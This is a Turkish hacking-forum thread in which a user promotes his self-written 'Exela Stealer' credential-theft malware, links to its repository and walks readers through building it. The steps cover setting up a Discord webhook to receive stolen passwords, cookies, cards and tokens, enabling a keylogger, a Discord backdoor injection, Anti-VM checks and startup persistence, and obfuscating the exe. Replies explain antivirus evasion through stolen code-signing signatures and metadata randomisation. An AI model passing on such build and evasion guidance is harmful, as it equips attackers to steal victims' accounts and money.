Yüzde yüz türk yapımı Grabber (Exela Stealer)

quicaxd

Yeni üye
22 Ağu 2023
9
7
Merhaba arkadaşlar, bugün sizlere kendi kodladığım stabil çalışan, birçok özelik barındıran ve scantime/runtime için fud olan grabberımı göstericem öncelikle indirme linkini bırakıyorum ardından kullanımını anlatıcam hergangi bir sorunuz olursa yada anlamadığınız birşey bana telegram üzerinden ulaşabilrisiniz (Projemi starlamayı unutmayın)

Download Link: GitHub - quicaxd/Exela-V2.0: Exela Stealer runtime and scantime undetectable, fud stealer written in python, password stealer & cookie stealer & credit/debit card stealer & history stealer & download stealer & session stealer (instagram, twitter, tiktok, reddit, roblox, steam session stealer) & token stealer & Discord token stealer/grabber & wifi stealer & python keylogger

Öncelikle dosyayı indiriyoruz
Ardından pythonın kendi resmi sitesinden python 3.11.0 yada 3.10.0 indiriyoruz ve kuruyoruz (not: kurarken add python.exe to path, kısmını tikleyin aksi halde çalışmaz).
Ardından Install Now diyoruz ve Python kuruluyor
7l0722m.png


Python'ı kurduktan sonra Exela-V2.0 klasörüne geliyoruz ve install.bat dosyasına tıklıyoruz
Ardından bizden webhook isticek webhook için bir discord hesabı açıyoruz ardında bir discord sunucusu açıyoruz
aşığdaki ekran resimlerindeki gibi yapıp webhooku kopyalıyoruz

q1diw4w.png
50c2uto.png
he1pk25.png
kyx2tsg.png

sonra "enter your webhook url" kısmında webhookumuzu yapıştırıyoruz

rp0v29x.png
tamamdır webhooku kopyaladıktan
tamamdır şimdi bize "Do u want pump the file" diye soru sorucak bu dosya boyutunu arttırmak istiyip istemidiğimiz soruyor eğer ki yes yazarsanız sizden mb olarak bir boyut isticek o boyut kadar da dosya boyutunu artırıcak

iery1t0.png


şimdi ise bizden dosyanın iconunu değiştirmek istiyip istemediğimiz sorucak eğerki yes girerseniz sizden ico dosyasını isticek (not dosya .ico dosyası olmak zorundadır)
7o7b2j4.png

tamamdır şimdi ise bizden Anti-VM kullanmak istiyip istemediğimiz sorucak (Anti VM: dosyanın sanal makinelerde çalışmamasını sağlar)
bu seçenekten sonra Discord İnjection kullanmak istiyip istemediğimiz sorucak (Discord Injection: Discordun backup dosyalarına backdoor yerleştirerek kullanıcı discord hesabından çıkıp girdikten sonra yada email veya şifresini değiştirdikten sonra bizim sunucumuza token, email ve şifre bilgilerini gönderir)
bu seçenekten sonra Keylogger Enjtekte etmek istiyip istemediğimiz sorucak ( Keylogger kullanıcının tuş vuruşlarını kaydeder)
bu seçenekten sonra bizde startup sorucak bunu yeslerseniz dosyayı sizin seçtiğiniz methoda göre startup a kopyalar (not: 2. seçenek önerimdir)
son olarak da fake error istiyip istemediğimiz sorucak (Fake error: sahte hata mesajı)

tüm bunlardan sonra dosyayı obfuscate edip exe yapıcaktır tek yapmanız gerken 20,25
7reebjt.png
saniye beklemek

Tamamdır şimdi tek yapmamız gereken pencereyi kapatıp, klasörü açıp Exela.exe dosyasını görmek!
waqno8h.png
 
Moderatör tarafında düzenlendi:

Napcaz

Anka Team Senior
28 Nis 2019
727
629
Cudi
digital-sign olayını ilk defa görüyorum tam olarak ne işe yarıyor? Kodun ne kadarı sana ait? Varsa alıntıladığın kaynakları belirtir misin? "RenameEntryPoint" bu ne işe yarıyor ne yapıyor?
 

quicaxd

Yeni üye
22 Ağu 2023
9
7
digital-sign olayını ilk defa görüyorum tam olarak ne işe yarıyor? Kodun ne kadarı sana ait? Varsa alıntıladığın kaynakları belirtir misin? "RenameEntryPoint" bu ne işe yarıyor ne yapıyor?
Selam, digital sign dosyaya dijital imza ekliyor digital sign kısmını aldım sadece geri kalan kısmı full bana ait, renameEntryPoint ise exe dosyasındaki metadata ile alakalı ufak bi değişik lik yapıyor


Digital Sign Link : GitHub - secretsquirrel/SigThief: Stealing Signatures and Making One Invalid Signature at a Time
 

Napcaz

Anka Team Senior
28 Nis 2019
727
629
Cudi
Selam, digital sign dosyaya dijital imza ekliyor digital sign kısmını aldım sadece geri kalan kısmı full bana ait, renameEntryPoint ise exe dosyasındaki metadata ile alakalı ufak bi değişik lik yapıyor


Digital Sign Link : GitHub - secretsquirrel/SigThief: Stealing Signatures and Making One Invalid Signature at a Time
Dijital İmza ne işe yarıyor orayı biraz teknik bilginle detaylandırabilir misin. EntryPoint ne demek biliyorum o konuda da mümkünse daha teknik bir açıklama istiyorum. Teşekkür ederim.
 

quicaxd

Yeni üye
22 Ağu 2023
9
7
Dijital İmza ne işe yarıyor orayı biraz teknik bilginle detaylandırabilir misin. EntryPoint ne demek biliyorum o konuda da mümkünse daha teknik bir açıklama istiyorum. Teşekkür ederim.
Dijital imza, exe dosyasına imza ekliyor bu bazı imza tabanlı antivirusleri bypass etmeye yarıyor detaylı bilgi için : Dijital imzalar ve sertifikalar - Microsoft Desteği


Entry Point olayında ise belirli bir entry point için o entryp pointi rastgele bytelar ile değiştirir örneğin bizim entry pointimiz exe dosyasında loader-o bunu rastgele byte değerleri ile değiştiriyoruz

Umarım yardımcı olmuştur bu arada projeyi starlarsaniz sevinirim
 

Napcaz

Anka Team Senior
28 Nis 2019
727
629
Cudi
Entry Point olayında ise belirli bir entry point için o entryp pointi rastgele bytelar ile değiştirir örneğin bizim entry pointimiz exe dosyasında loader-o bunu rastgele byte değerleri ile değiştiriyoruz
"loader-o" ne? Pyinstaller ile alakalı bir şey mi öyleyse neden onu rastgele numaralar ile değiştiriyoruz bu ne işimize yarıyor.
 

H@cked BaBy

Uzman üye
28 Haz 2023
1,135
426
Arkana bak
Merhaba arkadaşlar, bugün sizlere kendi kodladığım stabil çalışan, birçok özelik barındıran ve scantime/runtime için fud olan grabberımı göstericem öncelikle indirme linkini bırakıyorum ardından kullanımını anlatıcam hergangi bir sorunuz olursa yada anlamadığınız birşey bana telegram üzerinden ulaşabilrisiniz (Projemi starlamayı unutmayın)

Telegram: quicaxd
Download Link: GitHub - quicaxd/Exela-V2.0: Exela Stealer runtime and scantime undetectable, fud stealer written in python, password stealer & cookie stealer & credit/debit card stealer & history stealer & download stealer & session stealer (instagram, twitter, tiktok, reddit, roblox, steam session stealer) & token stealer & Discord token stealer/grabber & wifi stealer & python keylogger

Öncelikle dosyayı indiriyoruz
Ardından pythonın kendi resmi sitesinden python 3.11.0 yada 3.10.0 indiriyoruz ve kuruyoruz (not: kurarken add python.exe to path, kısmını tikleyin aksi halde çalışmaz).
Ardından Install Now diyoruz ve Python kuruluyor
7l0722m.png


Python'ı kurduktan sonra Exela-V2.0 klasörüne geliyoruz ve install.bat dosyasına tıklıyoruz
Ardından bizden webhook isticek webhook için bir discord hesabı açıyoruz ardında bir discord sunucusu açıyoruz
aşığdaki ekran resimlerindeki gibi yapıp webhooku kopyalıyoruz

q1diw4w.png
50c2uto.png
he1pk25.png
kyx2tsg.png

sonra "enter your webhook url" kısmında webhookumuzu yapıştırıyoruz

rp0v29x.png
tamamdır webhooku kopyaladıktan
tamamdır şimdi bize "Do u want pump the file" diye soru sorucak bu dosya boyutunu arttırmak istiyip istemidiğimiz soruyor eğer ki yes yazarsanız sizden mb olarak bir boyut isticek o boyut kadar da dosya boyutunu artırıcak

iery1t0.png


şimdi ise bizden dosyanın iconunu değiştirmek istiyip istemediğimiz sorucak eğerki yes girerseniz sizden ico dosyasını isticek (not dosya .ico dosyası olmak zorundadır)
7o7b2j4.png

tamamdır şimdi ise bizden Anti-VM kullanmak istiyip istemediğimiz sorucak (Anti VM: dosyanın sanal makinelerde çalışmamasını sağlar)
bu seçenekten sonra Discord İnjection kullanmak istiyip istemediğimiz sorucak (Discord Injection: Discordun backup dosyalarına backdoor yerleştirerek kullanıcı discord hesabından çıkıp girdikten sonra yada email veya şifresini değiştirdikten sonra bizim sunucumuza token, email ve şifre bilgilerini gönderir)
bu seçenekten sonra Keylogger Enjtekte etmek istiyip istemediğimiz sorucak ( Keylogger kullanıcının tuş vuruşlarını kaydeder)
bu seçenekten sonra bizde startup sorucak bunu yeslerseniz dosyayı sizin seçtiğiniz methoda göre startup a kopyalar (not: 2. seçenek önerimdir)
son olarak da fake error istiyip istemediğimiz sorucak (Fake error: sahte hata mesajı)

tüm bunlardan sonra dosyayı obfuscate edip exe yapıcaktır tek yapmanız gerken 20,25
7reebjt.png
saniye beklemek

Tamamdır şimdi tek yapmamız gereken pencereyi kapatıp, klasörü açıp Exela.exe dosyasını görmek!
waqno8h.png
Bu seninmi yoksa alıntımı?
Alıntı ise kaynak vereydin keşke
 

</>

Yeni üye
30 Ağu 2023
19
1
Merhaba arkadaşlar, bugün sizlere kendi kodladığım stabil çalışan, birçok özelik barındıran ve scantime/runtime için fud olan grabberımı göstericem öncelikle indirme linkini bırakıyorum ardından kullanımını anlatıcam hergangi bir sorunuz olursa yada anlamadığınız birşey bana telegram üzerinden ulaşabilrisiniz (Projemi starlamayı unutmayın)

Telegram: quicaxd
Download Link: GitHub - quicaxd/Exela-V2.0: Exela Stealer runtime and scantime undetectable, fud stealer written in python, password stealer & cookie stealer & credit/debit card stealer & history stealer & download stealer & session stealer (instagram, twitter, tiktok, reddit, roblox, steam session stealer) & token stealer & Discord token stealer/grabber & wifi stealer & python keylogger

Öncelikle dosyayı indiriyoruz
Ardından pythonın kendi resmi sitesinden python 3.11.0 yada 3.10.0 indiriyoruz ve kuruyoruz (not: kurarken add python.exe to path, kısmını tikleyin aksi halde çalışmaz).
Ardından Install Now diyoruz ve Python kuruluyor
7l0722m.png


Python'ı kurduktan sonra Exela-V2.0 klasörüne geliyoruz ve install.bat dosyasına tıklıyoruz
Ardından bizden webhook isticek webhook için bir discord hesabı açıyoruz ardında bir discord sunucusu açıyoruz
aşığdaki ekran resimlerindeki gibi yapıp webhooku kopyalıyoruz

q1diw4w.png
50c2uto.png
he1pk25.png
kyx2tsg.png

sonra "enter your webhook url" kısmında webhookumuzu yapıştırıyoruz

rp0v29x.png
tamamdır webhooku kopyaladıktan
tamamdır şimdi bize "Do u want pump the file" diye soru sorucak bu dosya boyutunu arttırmak istiyip istemidiğimiz soruyor eğer ki yes yazarsanız sizden mb olarak bir boyut isticek o boyut kadar da dosya boyutunu artırıcak

iery1t0.png


şimdi ise bizden dosyanın iconunu değiştirmek istiyip istemediğimiz sorucak eğerki yes girerseniz sizden ico dosyasını isticek (not dosya .ico dosyası olmak zorundadır)
7o7b2j4.png

tamamdır şimdi ise bizden Anti-VM kullanmak istiyip istemediğimiz sorucak (Anti VM: dosyanın sanal makinelerde çalışmamasını sağlar)
bu seçenekten sonra Discord İnjection kullanmak istiyip istemediğimiz sorucak (Discord Injection: Discordun backup dosyalarına backdoor yerleştirerek kullanıcı discord hesabından çıkıp girdikten sonra yada email veya şifresini değiştirdikten sonra bizim sunucumuza token, email ve şifre bilgilerini gönderir)
bu seçenekten sonra Keylogger Enjtekte etmek istiyip istemediğimiz sorucak ( Keylogger kullanıcının tuş vuruşlarını kaydeder)
bu seçenekten sonra bizde startup sorucak bunu yeslerseniz dosyayı sizin seçtiğiniz methoda göre startup a kopyalar (not: 2. seçenek önerimdir)
son olarak da fake error istiyip istemediğimiz sorucak (Fake error: sahte hata mesajı)

tüm bunlardan sonra dosyayı obfuscate edip exe yapıcaktır tek yapmanız gerken 20,25
7reebjt.png
saniye beklemek

Tamamdır şimdi tek yapmamız gereken pencereyi kapatıp, klasörü açıp Exela.exe dosyasını görmek!
waqno8h.png
Eline sağlık hocam deneyeceğim
 
7 Ağu 2023
95
55
Dostum fud bı virüs değil virüs total log tutuyor umarım bunu biliyorsundur zaten esette patlamış sözde fud olan ne kadara fudu upgrade et yine patlar bı kere virüs totale düştümu ben şayet malware yazan birisinin virüs totalde test yapacağını zannetmem
 

quicaxd

Yeni üye
22 Ağu 2023
9
7
Dostum fud bı virüs değil virüs total log tutuyor umarım bunu biliyorsundur zaten esette patlamış sözde fud olan ne kadara fudu upgrade et yine patlar bı kere virüs totale düştümu ben şayet malware yazan birisinin virüs totalde test yapacağını zannetmem
Knk birincisi virüs Total makinelerini banladım kodumda anti-debug kısmına bakabilirsin 2. Bunu free olarak yapıyorum yani vt e atılıp atılmamasi umurumda değil. Ayrıca virüs totalin log tuttuğunu biliyorum git bi araştır bakim
 

Doctor--x

Yeni üye
23 Eyl 2023
36
8
"loader-o" ne? Pyinstaller ile alakalı bir şey mi öyleyse neden onu rastgele numaralar ile değiştiriyoruz bu ne işimize yarıyor.
EXE'leri sertifikalarsan çoğu antivirus programı dosya'yı zararsız olarak görür.
bu kadar soruyu soracağına chatgpt'ye sorsan emin ol daha fazla bilgiye sahip olurdun.
 

Napcaz

Anka Team Senior
28 Nis 2019
727
629
Cudi
EXE'leri sertifikalarsan çoğu antivirus programı dosya'yı zararsız olarak görür.
bu kadar soruyu soracağına chatgpt'ye sorsan emin ol daha fazla bilgiye sahip olurdun.
Şuana kadar verdiğiniz cevaplar bana bir şey öğretmedi zaten sallayarak bende bunlari anlatırım benim istediğim işin mutfagindan ogrenmek. Ama siz ne mekanizmanın pratiğine değiniyorsunuz ne tarihçesine nede teknik detaylarına ve bunlar gibi ufuk açıcı taraflarina o yüzden haklisiniz. ChatGPT bu yüzeysel tanımlamaları sizden veya ondan daha iyi yapardı.
 

Doctor--x

Yeni üye
23 Eyl 2023
36
8
Şuana kadar verdiğiniz cevaplar bana bir şey öğretmedi zaten ne işin pratiğine değiniyorsunuz ne tarihçesine nede teknik detaylarına o yüzden haklisiniz. ChatGPT bu yüzeysel tanımlamaları sizden daha iyi yapardı.
Mantığı arkadaş yukarıda anlatmış.

bazı antivirüs firmaları 'Güvenilir satıcılar' adında bir havuz yapmış misal ESET,GOOGLE gibi firmaların sertifikası ile imzalanmış EXE'leri taramaya almıyor.

fakat bu tamamen yakalanmayacağı anlamınada gelmiyor.

örnek olarak comodo antivirus'e ait white vendors list

 

quicaxd

Yeni üye
22 Ağu 2023
9
7
Şuana kadar verdiğiniz cevaplar bana bir şey öğretmedi zaten sallayarak bende bunlari anlatırım benim istediğim işin mutfagindan ogrenmek. Ama siz ne mekanizmanın pratiğine değiniyorsunuz ne tarihçesine nede teknik detaylarına ve bunlar gibi ufuk açıcı taraflarina o yüzden haklisiniz. ChatGPT bu yüzeysel tanımlamaları sizden veya ondan daha iyi yapardı.
Knk dijital imzanın ne olduğunu sana zaten 0 dan anlatamam

Entrypoint olayında ise pyinstaller ile exe yaptıktan sonra dosyanın metadasinda dosya ismi de yazılı olur biz de bunu rastgele byte lar ile değiştiriyoruz ki her buildde aynı olmasın yada dosya ismini örneğin Exela ismini antivirusler blackliste alırsa diye ufak bi önlem gibi düşün
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.